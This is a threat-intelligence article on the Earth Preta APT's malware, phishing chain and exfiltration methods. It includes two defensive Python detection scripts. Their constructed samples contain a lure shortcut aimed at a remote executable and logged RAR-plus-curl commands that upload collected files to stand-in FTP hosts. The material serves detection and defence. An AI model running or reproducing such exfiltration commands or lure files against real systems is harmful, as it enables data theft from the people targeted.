Preta Power: innovative tools empower cyber enhancement initiatives


Earth Preta (also tracked as Mustang Panda), a Chinese Advanced Persistent Threat (APT) group, has been active for over a decade, targeting government entities, academia and research organizations worldwide. The new tools it has recently added to its arsenal have raised concern among defenders.
Earth Preta’s Evolution:
Researchers have observed a shift in Earth Preta's delivery tactics. The group now spreads its PUBLOAD malware with a variant of the HIUPAN worm, which propagates through removable drives. This removable-media vector supplements, rather than replaces, the spear-phishing the group continues to use, and it can carry the malware into networks that mail filtering alone does not protect.
PUBLOAD Malware:
PUBLOAD is the primary control tool for collection and exfiltration: it packs data with RAR and uploads the archives to FTP sites with cURL. Earth Preta has also introduced FDMTP, a malware downloader built on the TouchSocket library, and PTSOCKET, an alternative channel for exfiltration. Because RAR and cURL are legitimate command-line utilities, the useful signal for defenders is not the binaries themselves but how they are invoked: from unexpected parent processes, with date or file-type filters, or with FTP upload targets.
Spear-Phishing Campaign:
Earth Preta's multi-stage spear-phishing attack begins with an email carrying a .url (Internet shortcut) attachment. Opening the shortcut starts a chain of components: a decoy document shown to the victim, the DOWNBAIT downloader, PULLBAIT, CBROVER and finally PLUGX, a long-standing backdoor that gives the attackers remote access to the compromised system. The shortcut itself contains no exploit; it relies on the user opening it, so inspecting .url attachments at the mail gateway is a cheap first check.
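As an added example, not code from the original article or from the Trend Micro research it summarizes, the following Python script parses .url attachments of the kind described above and flags shortcuts whose target is a remote file rather than a web page. The sample shortcut contents are constructed for the example, and the heuristics (file:// or UNC targets, executable extensions, an IconFile on a remote share) are general .url triage checks rather than specifics taken from the page.

```python
import configparser
from urllib.parse import urlparse

# Constructed .url attachments for the example (not real samples). The Internet
# Shortcut format is an INI file with an [InternetShortcut] section.
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"

SUSPICIOUS_URL_FILE = (
    "[InternetShortcut]\r\n"
    # Hypothetical target: a file:// URL with a host and port is treated like a
    # WebDAV UNC path, so opening the shortcut launches a remote executable.
    "URL=file://203.0.113.10@80/share/Invitation.pdf.exe\r\n"
    "IconFile=\\\\203.0.113.10\\share\\icon.ico\r\n"
    "IconIndex=1\r\n"
)

HTTPS_EXE_URL_FILE = (
    "[InternetShortcut]\r\nURL=https://webdav.example.net/files/report.exe\r\n"
)

# Extensions that Windows executes (or hands to a script host) when opened.
EXECUTABLE_EXTS = (".exe", ".dll", ".scr", ".bat", ".cmd", ".hta",
                   ".js", ".vbs", ".msi", ".lnk", ".ps1")


def parse_url_file(text):
    """Return the URL and IconFile values from a .url file, or raise if malformed."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text.replace("\r\n", "\n"))
    if not cp.has_section("InternetShortcut"):
        raise ValueError("not an Internet Shortcut file")
    section = cp["InternetShortcut"]          # option names match case-insensitively
    return {"url": section.get("URL", ""), "iconfile": section.get("IconFile", "")}


def triage_url_file(text):
    """Return the reasons the shortcut looks like a lure; an empty list means nothing flagged."""
    info = parse_url_file(text)
    reasons = []
    target = urlparse(info["url"])
    if target.scheme.lower() == "file" or info["url"].startswith("\\\\"):
        reasons.append("target is a file:// or UNC path, so opening it launches a remote file")
    if target.path.lower().endswith(EXECUTABLE_EXTS):
        reasons.append("target name ends in an executable extension")
    if info["iconfile"].startswith("\\\\"):
        reasons.append("IconFile points to a remote share")
    return reasons


if __name__ == "__main__":
    for name, content in [("benign", BENIGN_URL_FILE),
                          ("suspicious", SUSPICIOUS_URL_FILE),
                          ("https-exe", HTTPS_EXE_URL_FILE)]:
        print(name, "->", triage_url_file(content) or "no findings")
```

A shortcut that merely points at a web page produces no findings; one whose target is an executable, or that is fetched over file:// or a UNC path, is worth detonating or blocking before it reaches a mailbox.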
Data Theft:
For collection, Earth Preta uses RAR and a tool called FILESAC to select files by type and by modification date range. The collected data is exfiltrated to OneDrive through the Microsoft Graph API, so the traffic blends in with legitimate use of Microsoft's cloud services and cannot be blocked by destination alone.
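As an added example, not code from the article or from the Trend Micro research it summarizes, the following Python script runs the detection logic suggested by the PUBLOAD and Data Theft sections above over constructed process-creation log lines: it looks for a RAR "add" command that filters by modification date (-ta/-tb) or by file mask (-n) and then, on the same host, a cURL upload (-T) to an FTP destination. The log format, host names, paths and addresses are made up for the example; the RAR and cURL switches are the tools' real ones.

```python
import re
from collections import defaultdict

# Constructed process-creation events for the example (pipe-separated:
# host|parent image|image|command line). Hosts, paths and addresses are made up.
SAMPLE_EVENTS = """\
host01|explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c dir C:\\Users
host01|svchost.exe|C:\\Users\\Public\\rar.exe|rar.exe a -r -ta20240101 -n*.doc -n*.docx -n*.pdf C:\\Users\\Public\\out.rar C:\\Users\\
host01|svchost.exe|C:\\Windows\\System32\\curl.exe|curl.exe -u ftpuser:ftppass -T C:\\Users\\Public\\out.rar ftp://198.51.100.7/upload/
host02|explorer.exe|C:\\Program Files\\WinRAR\\WinRAR.exe|WinRAR.exe a backup.rar D:\\Reports
host02|explorer.exe|C:\\Windows\\System32\\curl.exe|curl.exe https://example.com/ -o page.html
host03|svchost.exe|C:\\Users\\Public\\rar.exe|rar.exe a -ta20240601 -n*.xlsx C:\\Users\\Public\\x.rar C:\\Users\\
host03|svchost.exe|C:\\Windows\\System32\\curl.exe|curl.exe -T C:\\Users\\Public\\other.rar ftp://198.51.100.8/
"""

RAR_BINARIES = {"rar.exe", "rar", "winrar.exe", "winrar"}
CURL_BINARIES = {"curl.exe", "curl"}
RAR_DATE_SWITCH = re.compile(r"^-t[ab]\d{4,14}$")   # -ta<date>/-tb<date>: modified after/before
RAR_MASK_SWITCH = re.compile(r"^-n(.+)$")           # -n<mask>: include only matching files


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line):
    host, parent, image, cmdline = line.split("|", 3)
    # Whitespace splitting is enough for the constructed sample; real command lines
    # need proper Windows argument parsing to cope with quoted paths.
    return {"host": host, "parent": parent, "image": image, "argv": cmdline.split()}


def rar_collection(argv):
    """Details of a RAR 'add' that filters by date or mask, or None.
    Matching on the file name is a known weak spot: a renamed rar.exe needs
    original-file-name or hash checks instead."""
    if len(argv) < 2 or basename(argv[0]) not in RAR_BINARIES or argv[1].lower() != "a":
        return None
    switches = [t for t in argv[2:] if t.startswith("-")]
    operands = [t for t in argv[2:] if not t.startswith("-")]
    dates = [s for s in switches if RAR_DATE_SWITCH.match(s)]
    masks = [m.group(1) for m in map(RAR_MASK_SWITCH.match, switches) if m]
    if not dates and not masks:
        return None                       # a plain backup job is not flagged
    return {"archive": operands[0] if operands else None, "dates": dates, "masks": masks}


def curl_ftp_upload(argv):
    """(uploaded file, destination) for a curl upload to FTP/FTPS, or None."""
    if not argv or basename(argv[0]) not in CURL_BINARIES:
        return None
    uploads = [argv[i + 1] for i, t in enumerate(argv[:-1]) if t in ("-T", "--upload-file")]
    urls = [t for t in argv if t.lower().startswith(("ftp://", "ftps://"))]
    if not uploads or not urls:
        return None
    return uploads[0], urls[0]


def find_exfil_chains(log_text):
    """Flag hosts where a filtered RAR collection is followed by a curl upload to FTP."""
    staged = defaultdict(list)            # host -> RAR collections seen so far
    findings = []
    for line in filter(None, log_text.splitlines()):
        ev = parse_event(line)
        coll = rar_collection(ev["argv"])
        if coll:
            staged[ev["host"]].append(coll)
            continue
        upload = curl_ftp_upload(ev["argv"])
        if upload and staged[ev["host"]]:
            uploaded, destination = upload
            known = {c["archive"].lower() for c in staged[ev["host"]] if c["archive"]}
            findings.append({
                "host": ev["host"],
                "parent": ev["parent"],
                "uploaded": uploaded,
                "destination": destination,
                # True when the uploaded file is exactly an archive RAR just produced;
                # False still deserves a look, since the staging file may have been renamed.
                "archive_match": uploaded.lower() in known,
                "filters": staged[ev["host"]][-1],
            })
    return findings


if __name__ == "__main__":
    for f in find_exfil_chains(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['uploaded']} -> {f['destination']} "
              f"(archive match: {f['archive_match']}, filters: {f['filters']})")
```

On the constructed sample, host01 and host03 are flagged while host02's ordinary WinRAR backup and HTTPS download are not. The same two-stage correlation applies when the upload goes to OneDrive instead of FTP; the second stage then has to key on the process that talks to the Graph API rather than on a curl command line.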
Infrastructure and Evasion:
The attack infrastructure includes a WebDAV server that hosts the malware and the decoy documents. To hinder detection and analysis, Earth Preta protects its payloads with XOR and RC4 encryption and loads its malicious DLLs through DLL side-loading, in which a legitimate signed executable is made to load an attacker's DLL placed beside it, so the malicious code runs under a trusted process name and allow-listing by signer alone does not catch it.
Conclusion:
Earth Preta's evolving tactics and layered evasion techniques pose a significant threat to many sectors, particularly government entities in the Asia-Pacific region. Defenders should monitor for the behaviours described here (removable-media propagation, filtered RAR archiving followed by FTP or OneDrive uploads, and side-loaded DLLs) rather than rely on static indicators alone, since the group keeps adding and rotating its tools.
